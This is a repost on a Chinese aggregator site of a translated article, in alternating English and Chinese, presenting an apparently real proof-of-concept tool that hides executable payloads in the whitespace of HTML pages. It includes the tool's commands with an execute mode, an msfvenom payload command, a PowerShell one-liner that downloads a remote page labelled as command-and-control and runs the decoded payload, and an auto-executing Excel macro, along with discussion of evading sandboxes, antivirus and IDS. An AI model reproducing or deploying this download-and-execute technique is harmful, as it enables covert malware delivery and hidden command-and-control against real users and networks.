當(dāng)前位置：首頁(yè) > 前端技术 > HTML >内容正文

HTML

漏洞poc和漏洞利用_带HTML的PowershellHTML空白空间隐写术和二进制漏洞利用交付[PoC]

發(fā)布時(shí)間：2024/3/12 HTML 25 豆豆

生活随笔收集整理的這篇文章主要介紹了漏洞poc和漏洞利用_带HTML的PowershellHTML空白空间隐写术和二进制漏洞利用交付[PoC] 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

漏洞poc和漏洞利用

實(shí)用隱寫術(shù) (Practical Steganography)

A few years ago I came across a very academic challenge: it was a ZIP file containing a particular HTML page, the aim was to obtain the usual FLAG.

幾年前，我遇到了一個(gè)非常學(xué)術(shù)性的挑戰(zhàn)：這是一個(gè)包含特定HTML頁(yè)面的ZIP文件，目的是獲得通常的標(biāo)志。

The web page didn’t have any “juicy clue”, script, image or anything else. The only strange thing was the size (a few MB) and the source was all in one line.

該網(wǎng)頁(yè)沒(méi)有任何“多汁的線索”，腳本，圖像或其他任何內(nèi)容。唯一奇怪的是它的大小(幾MB)，并且源代碼全部放在一行中。

The element that made me suspicious was the content: it was an extract from a Wikipedia page that kept repeating itself many times. So I tried looking for differences between one repetition and another, but I couldn’t find anything at all from a browser and therefore I checked the source directly. From there I discovered that I wasn’t able to find the same occurrences within the page, up to a certain point from which the code began to repeat itself constantly.

令我感到懷疑的要素是內(nèi)容：它是來(lái)自Wikipedia頁(yè)面的摘錄，該頁(yè)面不斷重復(fù)多次。因此，我嘗試查找一個(gè)重復(fù)與另一個(gè)重復(fù)之間的差異，但是我根本無(wú)法從瀏覽器中找到任何內(nèi)容，因此我直接檢查了源。從那里，我發(fā)現(xiàn)我無(wú)法在頁(yè)面中找到相同的事件，直到代碼開(kāi)始不斷重復(fù)的某個(gè)點(diǎn)為止。

Analyzing the differences in the HTML source, the only thing that emerged were double spaces between the words, arranged in an apparently random way.

分析HTML源代碼中的差異，唯一出現(xiàn)的是單詞之間的雙倍空格，以明顯隨機(jī)的方式排列。

Even I don’t know how I got there, but looking on the Internet I found some papers of Indian undergraduates (I think they were Indians) that illustrated the theory for implementing “inter-word” white spaces steganography (something like SNOW plus an interesting vector): applying their thesis to my own custom scripts I managed to trace binary files hidden within these duplicate white spaces on the page.

甚至我都不知道如何到達(dá)那里，但是在互聯(lián)網(wǎng)上，我發(fā)現(xiàn)一些印度大學(xué)生(我認(rèn)為他們是印度人)的論文，闡述了實(shí)現(xiàn)“字間”空白隱寫術(shù)的理論(例如SNOW和有趣的向量)：將其論文應(yīng)用于我自己的自定義腳本中，我設(shè)法跟蹤了隱藏在頁(yè)面上這些重復(fù)空白中的二進(jìn)制文件。

The files were images, which contained other images, compressed files, their passwords and finally the FLAG hidden in a digital audio file. And that was the challenge and the end of it.

這些文件是圖像，其中包含其他圖像，壓縮文件，它們的密碼以及最后隱藏在數(shù)字音頻文件中的標(biāo)志。這就是挑戰(zhàn)，也是挑戰(zhàn)的終點(diǎn)。

這個(gè)概念 (The Concept)

As you can see, I quoted SNOW (SNOW exploits the Steganographic Nature Of Whitespace).

如您所見(jiàn)，我引用了SNOW(SNOW利用空白的隱寫性質(zhì))。

What SNOW does is to append white spaces (spaces and tabs) at the end of each line of an ASCII file, thus encoding binary data and encrypting them in various ways. The advantage and limitation of this solution is that the amount of data that I can insert into a document is almost unlimited in relation to the number of lines available. The real disadvantage is that any text editor is able to highlight excess suspicious spaces and tabs at the end of the line, just like this information can be lost if the file is processed with parsers.

SNOW的作用是在ASCII文件的每一行的末尾添加空格(空格和制表符)，從而對(duì)二進(jìn)制數(shù)據(jù)進(jìn)行編碼并以各種方式對(duì)其進(jìn)行加密。該解決方案的優(yōu)點(diǎn)和局限性在于，相對(duì)于可用的行數(shù)，我可以插入到文檔中的數(shù)據(jù)量幾乎是無(wú)限的。真正的缺點(diǎn)是，任何文本編輯器都可以在行的末尾突出顯示多余的可疑空格和制表符，就像如果使用解析器處理文件時(shí)會(huì)丟失此信息一樣。

Steganography of inter-word white spaces, when applied to web pages, lets us insert any kind of binary data between one word and another, in an absolutely invisible way from a browser and hardly recognizable by reading the source: if you don’t know it’s there you will hardly notice it, because an extra space between one tag or word and the other does not make you think anything bad.

單詞間空白的隱寫術(shù)應(yīng)用于網(wǎng)頁(yè)時(shí)，使我們可以在瀏覽器中以一種絕對(duì)不可見(jiàn)的方式在一個(gè)單詞和另一個(gè)單詞之間插入任何類型的二進(jìn)制數(shù)據(jù)，并且很難通過(guò)閱讀源代碼來(lái)識(shí)別：如果您不知道它在那里，您幾乎不會(huì)注意到它，因?yàn)橐粋€(gè)標(biāo)簽或單詞與另一個(gè)標(biāo)簽或單詞之間的多余空間不會(huì)使您覺(jué)得不好。

The other positive side is that there is no data loss, because both static and dynamic HTML pages are transmitted to the client and their browser is entirely in charge of their interpretation.

另一個(gè)積極的方面是，沒(méi)有數(shù)據(jù)丟失，因?yàn)殪o態(tài)和動(dòng)態(tài)HTML頁(yè)面都被傳輸?shù)娇蛻舳?#xff0c;并且其瀏覽器完全負(fù)責(zé)其解釋。

Of course we have some limitations: you can enter as much data as the content of the “container” page is long, but this data can be compressed and you don’t necessarily need a lot of capacity if your payload are commands/binary and not information.

當(dāng)然，我們有一些限制：您可以輸入與“容器”頁(yè)面內(nèi)容長(zhǎng)一樣長(zhǎng)的數(shù)據(jù)，但是可以壓縮此數(shù)據(jù)，并且如果您的有效載荷是命令/二進(jìn)制文件，并且您不一定需要很多容量，沒(méi)有信息。

它是如何工作的 (How does it work)

Long story short: alternating single and double spaces using a sort of Manchester encoding.

長(zhǎng)話短說(shuō)：使用一種曼徹斯特編碼來(lái)交替使用單空格和雙空格。

Manchester binary data transmission曼徹斯特二進(jìn)制數(shù)據(jù)傳輸

So:

所以：

one space == 0
一個(gè)空格== 0
two spaces == 1
兩個(gè)空格== 1

This is possible because a browser will parse double spaces and always show them as single ones and spaces between tags are invisible to the reader.

這是可能的，因?yàn)闉g覽器將解析雙倍空格，并始終將其顯示為單個(gè)空格，并且標(biāo)簽之間的空格對(duì)于閱讀器是不可見(jiàn)的。

The file “pippo.html”:

文件“ pippo.html”：

Pippo (Goofy, in precedenza Dippy Dawg e Dippy the Goof<a href="#cite_note-:0-1">[1]</a>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<a href="#cite_note-:0-1">[1]</a> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<a href="#cite_note-:0-1">[1]</a>. è apparso in centinaia di cartoni animati come protagonista o comprimario<a href="#cite_note-:2-2">[2]</a> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<a href="#cite_note-3">[3]</a>.

…is exactly the same (has the same output) as “pipponinja.html”:

…與“ pipponinja.html”完全相同(具有相同的輸出)：

在實(shí)踐中 (In practice)

After banging my head trying to decode that cursed file, I thought of writing a POC to do the reverse operation and try to “weaponize” a possible payload.

在試圖解碼被詛咒的文件后，我想到要寫一個(gè)POC來(lái)做相反的操作，并試圖“武器化”可能的有效載荷。

Why do I say “weaponize”? Because I challenge any proxy / WAF / AV to analyze and identify every single space, embedded with potentially compressed or password protected payload, within each page sent in clear on a legit HTTP(S) port.

為什么我說(shuō)“武器化”？因?yàn)槲乙魬?zhàn)任何代理/ WAF / AV來(lái)分析和識(shí)別在合法HTTP(S)端口上以明文形式發(fā)送的每個(gè)頁(yè)面中嵌入了可能受壓縮或受密碼保護(hù)的有效負(fù)載的每個(gè)單個(gè)空間。

[actually it’s just extremely fun to put an MSF payload into an HTML file and make it “executable”]

[實(shí)際上，將MSF有效負(fù)載放入HTML文件并使它“可執(zhí)行”是非常有趣的。”

This is how HTML-Ninja is born, in the absence of better acronyms.

在沒(méi)有更好的縮寫的情況下， HTML-Ninja就是這樣誕生的。

The tool, raw and incomplete, is a POC written mainly in Python (with Javascript and VBA variants) and allows you to insert, extract and execute payloads within HTML files. Other features have been added in the meantime but it still is a free time project which has not had much feedback.

該工具是原始的和不完整的，主要是用Python(帶有Javascript和VBA變體)編寫的POC，并且允許您在HTML文件中插入，提取和執(zhí)行有效載荷。同時(shí)添加了其他功能，但它仍然是一個(gè)免費(fèi)項(xiàng)目，沒(méi)有太多反饋。

Help excerpt:

幫助摘錄：

html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryptionhtml-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption

Examples on github include:

github上的示例包括：

html-ninja.js和html-ninja.html (html-ninja.js & html-ninja.html)

Javascript version and sample HTML showing a “self-decryption” page.

Javascript版本和示例HTML，顯示“自解密”頁(yè)面。

macro_poc.bas和htm (macro_poc.bas & htm)

VBA version for automatic execution of payloads via Excel.

VBA版本，可通過(guò)Excel自動(dòng)執(zhí)行有效負(fù)載。

buf.txt (buf.txt)

Example of a MSF payload:

MSF有效負(fù)載示例：

msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt

…and a few others…

…和其他一些…

示范 (Demonstration)

Let’s take our buf.txt payload and hide it with zlib compression in pippo.html

讓我們獲取buf.txt有效負(fù)載，并在pippo.html中使用zlib壓縮將其隱藏

Now let’s “read” the content of pipporun.html

現(xiàn)在，讓我們“閱讀” pipporun.html的內(nèi)容

帶HTML的Powershell的二進(jìn)制漏洞利用交付[PoC] (Binary Exploit Delivery w/Powershell over HTML [PoC])

Static HTML file gets downloaded -> HTML hides binary data -> HTML gets “executed”

下載靜態(tài)HTML文件-> HTML隱藏二進(jìn)制數(shù)據(jù)->“執(zhí)行” HTML

Harmless static HTML page with embedded binary payload: https://ephreet.github.io/html-ninja/

具有嵌入式二進(jìn)制有效負(fù)載的無(wú)害靜態(tài)HTML頁(yè)面： https ： //ephreet.github.io/html-ninja/

Could embed msfvenom meterpreter or any other file, but for the sake of the PoC we are going with the usual “calc.exe”.

可以嵌入msfvenom meterpreter或任何其他文件，但是出于PoC的考慮，我們將使用通常的“ calc.exe”。

Proof of Concept run (payload = “iex calc.exe”):

概念驗(yàn)證運(yùn)行(有效載荷=“ iex calc.exe”)：

$CnC = "https://ephreet.github.io/html-ninja/"; $pch = "nil"; $b = ""; $ch = ""
foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().tocharArray()) {$ch = $cu;if ($pch -eq " "){if ($ch -eq " "){$b = $b + "1"; $ch = "nil"}else{$b = $b + "0";$ch = "nil"}};$pch = $ch}$c = ""
($b -split '(\w{8})' | ? {$_}) | ForEach-Object {$c = $c + [convert]::Tochar([System.Convert]::ToByte($_,2))};$p = $c.Split(" "); & $p[0] $p[1]

Source: https://github.com/ephreet/html-ninja/

資料來(lái)源： https : //github.com/ephreet/html-ninja/

沙盒[ANY.RUN] (SANDBOX [ANY.RUN])

Let’s see what a sandbox sees in relation to the payload inserted in Excel macro.

讓我們來(lái)看看與插入Excel宏中的有效負(fù)載有關(guān)的沙箱。

Used sandbox: any.run

二手沙箱： any.run

Payload: cmd.exe

有效負(fù)載：cmd.exe

The Excel file contains an onload macro that makes the request for the payload via HTTP and executes its content using the algorithm. I expect the abnormal behavior of the script and the download to be detected, but this is a simulation imagining an already running service.

Excel文件包含一個(gè)onload宏，該宏通過(guò)HTTP發(fā)出對(duì)有效負(fù)載的請(qǐng)求，并使用算法執(zhí)行其內(nèi)容。我希望可以檢測(cè)到腳本和下載的異常行為，但這是模擬一個(gè)已經(jīng)在運(yùn)行的服務(wù)。

The Excel file is opened and the payload executed, then it works. Obviously the sandbox realizes that something is wrong because the file has contacted a website and a command has been executed.

將打開(kāi)Excel文件并執(zhí)行有效負(fù)載，然后它就會(huì)工作。顯然，沙箱意識(shí)到出了點(diǎn)問(wèn)題，因?yàn)樵撐募雅c網(wǎng)站聯(lián)系并且已執(zhí)行命令。

Analyzing the HTTP request we can only see harmless HTML source:

分析HTTP請(qǐng)求，我們只能看到無(wú)害HTML源：

Which in this example is saved locally even if I am not required to do so, it doesn’t generate big alarms however:

即使我不需要在此示例中將其保存在本地，也不會(huì)生成大警報(bào)：

Let’s check on VirusTotal anyway:

無(wú)論如何，讓我們檢查VirusTotal：

These are the suspicious indicators: it is clearly unusual for Excel to make HTTP requests, but no alarm from IPS or IDS:

這些是可疑的指標(biāo)：Excel發(fā)出HTTP請(qǐng)求顯然很罕見(jiàn)，但是沒(méi)有來(lái)自IPS或IDS的警報(bào)：

To be clear, normally there would be some evidence like these, which are precisely the Suricata rules:

需要明確的是，通常會(huì)有一些類似的證據(jù)，這些正是Suricata規(guī)則：

Okay, the sandbox notices (of course) and the URL is quite obvious. Even a static analysis of the sample would have allowed us to trace the behavior.

好的，沙盒會(huì)發(fā)出通知(當(dāng)然)，并且URL很明顯。甚至樣本的靜態(tài)分析也可以讓我們追蹤行為。

But what if instead of delivering the payload I installed a service? What if it were a browser plugin? In short, if I could avoid the sandbox and the connections were towards http://random.foo/info.htm (invented!) could I rely only on the reputation of a domain?

但是，如果我沒(méi)有提供有效載荷，而是安裝了服務(wù)，該怎么辦？如果是瀏覽器插件怎么辦？簡(jiǎn)而言之，如果我能避免使用沙箱，并且連接指向http://random.foo/info.htm (已發(fā)明！)，我是否只能依靠域名的信譽(yù)？

結(jié)論 (Conclusions)

Okay, it’s a POC. Yes, a payload must still be delivered before it can be executed. And yes, a sandbox will still notice what is being done.

好的，這是一個(gè)POC。是的，有效負(fù)載仍然必須交付才能執(zhí)行。是的，沙箱仍會(huì)注意到正在執(zhí)行的操作。

But let’s imagine a more targeted version, perhaps with an offset from which to read the steganographed part in an HTML page, a service running on your PC that makes web requests to absolutely harmless pages that we control.

但是，讓我們想象一個(gè)更具針對(duì)性的版本，也許有一定的偏移量，可以讀取HTML頁(yè)面中的隱秘部分，這是一種在您的PC上運(yùn)行的服務(wù)，可向我們控制的絕對(duì)無(wú)害的頁(yè)面發(fā)出Web請(qǐng)求。

Wouldn’t that be a Command and Control hidden in plain sight? After the sandbox, would an IPS / IDS be able to intercept it?

難道這不是隱藏在視線中的命令和控制嗎？沙箱之后，IPS / IDS是否可以攔截它？

Meanwhile, I certainly had a lot of fun opening a reverse shell by “running” an HTML file.

同時(shí)，通過(guò)“運(yùn)行” HTML文件打開(kāi)反向外殼當(dāng)然很有趣。

翻譯自: https://medium.com/swlh/html-whitespace-steganography-binary-exploit-delivery-w-powershell-over-html-poc-68fc286c581d

漏洞poc和漏洞利用

總結(jié)

以上是生活随笔為你收集整理的漏洞poc和漏洞利用_带HTML的PowershellHTML空白空间隐写术和二进制漏洞利用交付[PoC]的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： sdi线缆标准_常用线缆传输距离的汇总
下一篇： 2017年html5行业报告,云适配发布